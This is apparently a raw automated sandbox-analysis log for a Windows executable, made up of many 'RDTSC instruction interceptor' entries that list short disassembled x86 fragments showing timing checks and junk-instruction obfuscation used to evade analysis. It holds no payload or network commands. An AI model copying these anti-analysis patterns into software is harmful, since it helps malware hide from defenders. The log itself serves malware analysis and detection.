Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 350066 second address: 35006C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 34E7D9 second address: 34E7DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 353F8D second address: 353F91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 35090C second address: 350931 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8EA52B3CB1h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F8EA52B3CACh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 354F27 second address: 354F2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 35314E second address: 353154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 353154 second address: 353161 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 353161 second address: 353167 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3551B3 second address: 3551B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 353167 second address: 35316B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3560B0 second address: 356147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F8EA4E2EA48h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 push dword ptr fs:[00000000h] 0x0000002a push 00000000h 0x0000002c push ebx 0x0000002d call 00007F8EA4E2EA48h 0x00000032 pop ebx 0x00000033 mov dword ptr [esp+04h], ebx 0x00000037 add dword ptr [esp+04h], 0000001Ch 0x0000003f inc ebx 0x00000040 push ebx 0x00000041 ret 0x00000042 pop ebx 0x00000043 ret 0x00000044 or dword ptr [ebp+122D2E5Ch], ecx 0x0000004a mov dword ptr fs:[00000000h], esp 0x00000051 or ebx, 412C6717h 0x00000057 mov eax, dword ptr [ebp+122D0579h] 0x0000005d push edi 0x0000005e sub bx, EDE1h 0x00000063 pop ebx 0x00000064 mov di, ax 0x00000067 push FFFFFFFFh 0x00000069 cmc 0x0000006a nop 0x0000006b push eax 0x0000006c push edx 0x0000006d pushad 0x0000006e jnc 00007F8EA4E2EA46h 0x00000074 jmp 00007F8EA4E2EA56h 0x00000079 popad 0x0000007a rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 35316B second address: 35316F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 356147 second address: 35614C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 35316F second address: 3531FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F8EA52B3CA8h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 0000001Ch 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 mov bl, F6h 0x00000025 push dword ptr fs:[00000000h] 0x0000002c push 00000000h 0x0000002e push edi 0x0000002f call 00007F8EA52B3CA8h 0x00000034 pop edi 0x00000035 mov dword ptr [esp+04h], edi 0x00000039 add dword ptr [esp+04h], 00000018h 0x00000041 inc edi 0x00000042 push edi 0x00000043 ret 0x00000044 pop edi 0x00000045 ret 0x00000046 jmp 00007F8EA52B3CB2h 0x0000004b mov dword ptr fs:[00000000h], esp 0x00000052 mov dword ptr [ebp+12478F2Ah], edx 0x00000058 mov eax, dword ptr [ebp+122D04EDh] 0x0000005e cmc 0x0000005f push FFFFFFFFh 0x00000061 add dword ptr [ebp+122D389Ch], eax 0x00000067 nop 0x00000068 push eax 0x00000069 push edx 0x0000006a js 00007F8EA52B3CA8h 0x00000070 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 35614C second address: 356160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F8EA4E2EA4Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 356160 second address: 356164 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 359062 second address: 359068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 35A260 second address: 35A264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 35B079 second address: 35B105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 call 00007F8EA4E2EA56h 0x0000000e mov ebx, dword ptr [ebp+122D3BCDh] 0x00000014 pop ebx 0x00000015 push 00000000h 0x00000017 jmp 00007F8EA4E2EA56h 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ebx 0x00000021 call 00007F8EA4E2EA48h 0x00000026 pop ebx 0x00000027 mov dword ptr [esp+04h], ebx 0x0000002b add dword ptr [esp+04h], 00000016h 0x00000033 inc ebx 0x00000034 push ebx 0x00000035 ret 0x00000036 pop ebx 0x00000037 ret 0x00000038 mov ebx, dword ptr [ebp+122D1BB0h] 0x0000003e jo 00007F8EA4E2EA52h 0x00000044 js 00007F8EA4E2EA4Ch 0x0000004a mov dword ptr [ebp+122D2C5Ch], eax 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F8EA4E2EA53h 0x00000058 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 35A264 second address: 35A268 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 35A268 second address: 35A26E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 35C0AA second address: 35C104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebp 0x0000000a call 00007F8EA52B3CA8h 0x0000000f pop ebp 0x00000010 mov dword ptr [esp+04h], ebp 0x00000014 add dword ptr [esp+04h], 00000018h 0x0000001c inc ebp 0x0000001d push ebp 0x0000001e ret 0x0000001f pop ebp 0x00000020 ret 0x00000021 xor bh, FFFFFF9Ah 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ebx 0x00000029 call 00007F8EA52B3CA8h 0x0000002e pop ebx 0x0000002f mov dword ptr [esp+04h], ebx 0x00000033 add dword ptr [esp+04h], 0000001Ah 0x0000003b inc ebx 0x0000003c push ebx 0x0000003d ret 0x0000003e pop ebx 0x0000003f ret 0x00000040 mov di, bx 0x00000043 push 00000000h 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 push edi 0x00000049 push edi 0x0000004a pop edi 0x0000004b pop edi 0x0000004c rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 35ED59 second address: 35ED5F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 35ED5F second address: 35EDB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA52B3CADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov edi, 5AFFFFDBh 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F8EA52B3CA8h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D1880h], edx 0x00000033 push 00000000h 0x00000035 jne 00007F8EA52B3CA8h 0x0000003b xchg eax, esi 0x0000003c js 00007F8EA52B3CB4h 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 pop eax 0x00000046 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 35EDB2 second address: 35EDB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 35FCF8 second address: 35FD63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA52B3CB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F8EA52B3CA8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 mov edi, 363026CEh 0x0000002c mov dword ptr [ebp+1244935Bh], ecx 0x00000032 push 00000000h 0x00000034 or dword ptr [ebp+122D1A6Fh], edi 0x0000003a xor edi, 47D69DADh 0x00000040 push 00000000h 0x00000042 or dword ptr [ebp+122D59C8h], esi 0x00000048 push eax 0x00000049 jbe 00007F8EA52B3CBCh 0x0000004f push eax 0x00000050 push edx 0x00000051 jno 00007F8EA52B3CA6h 0x00000057 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 35EF82 second address: 35EF86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 35EF86 second address: 35EF9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jbe 00007F8EA52B3CA6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 jns 00007F8EA52B3CA6h 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 35EF9F second address: 35EFB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8EA4E2EA55h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 35FE66 second address: 35FE6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 361EA2 second address: 361EAC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8EA4E2EA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 360F90 second address: 360F96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 361069 second address: 361089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8EA4E2EA58h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 361089 second address: 36109B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 je 00007F8EA52B3CB0h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 36206C second address: 362071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 362071 second address: 362103 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA52B3CACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a or dword ptr [ebp+122D17E1h], edi 0x00000010 push dword ptr fs:[00000000h] 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007F8EA52B3CA8h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 0000001Dh 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 pushad 0x00000032 mov dl, 15h 0x00000034 jbe 00007F8EA52B3CA6h 0x0000003a popad 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 push 00000000h 0x00000044 push ecx 0x00000045 call 00007F8EA52B3CA8h 0x0000004a pop ecx 0x0000004b mov dword ptr [esp+04h], ecx 0x0000004f add dword ptr [esp+04h], 00000016h 0x00000057 inc ecx 0x00000058 push ecx 0x00000059 ret 0x0000005a pop ecx 0x0000005b ret 0x0000005c mov edi, 59D9CEA9h 0x00000061 mov eax, dword ptr [ebp+122D0B25h] 0x00000067 mov bx, dx 0x0000006a push FFFFFFFFh 0x0000006c mov di, si 0x0000006f nop 0x00000070 pushad 0x00000071 jne 00007F8EA52B3CA8h 0x00000077 push ebx 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 362103 second address: 362121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8EA4E2EA54h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 362121 second address: 362125 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 36A0DF second address: 36A0E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 36985A second address: 369870 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA52B3CB1h 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 369A4E second address: 369A54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 369A54 second address: 369A58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 369CF5 second address: 369CF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 369CF9 second address: 369CFF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 37381D second address: 373837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8EA4E2EA56h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 373B45 second address: 373B49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 373B49 second address: 373B6C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F8EA4E2EA5Dh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 373B6C second address: 373B72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 373B72 second address: 373B76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 373B76 second address: 373B7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 373B7C second address: 373B89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 373B89 second address: 373B8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 374202 second address: 374208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 310CDC second address: 310D04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA52B3CABh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8EA52B3CB3h 0x0000000e jl 00007F8EA52B3CA6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 310D04 second address: 310D12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA4E2EA4Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 37E2E2 second address: 37E2F8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8EA52B3CA6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007F8EA52B3CA6h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 37E2F8 second address: 37E2FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 37E2FE second address: 37E308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 37E308 second address: 37E312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 37D3BC second address: 37D3CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F8EA52B3CA6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 37D3CD second address: 37D3EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8EA4E2EA4Ch 0x0000000b popad 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 jg 00007F8EA4E2EA46h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 37D7AD second address: 37D7B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 37D7B3 second address: 37D7B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 37DA79 second address: 37DA7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 37DD3C second address: 37DD5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA4E2EA57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 37DD5B second address: 37DD71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jnc 00007F8EA52B3CA6h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jnc 00007F8EA52B3CA6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3853D4 second address: 3853FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA4E2EA4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8EA4E2EA52h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3853FD second address: 385403 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 385403 second address: 38542C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jc 00007F8EA4E2EA5Dh 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 38542C second address: 385432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 385432 second address: 38544B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8EA4E2EA4Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 383F23 second address: 383F31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8EA52B3CAAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 383F31 second address: 383F55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 js 00007F8EA4E2EA46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8EA4E2EA54h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3840DB second address: 3840DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 384238 second address: 384245 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F8EA4E2EA46h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 38499F second address: 3849A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3849A3 second address: 3849A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 384C71 second address: 384C77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 384C77 second address: 384C7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
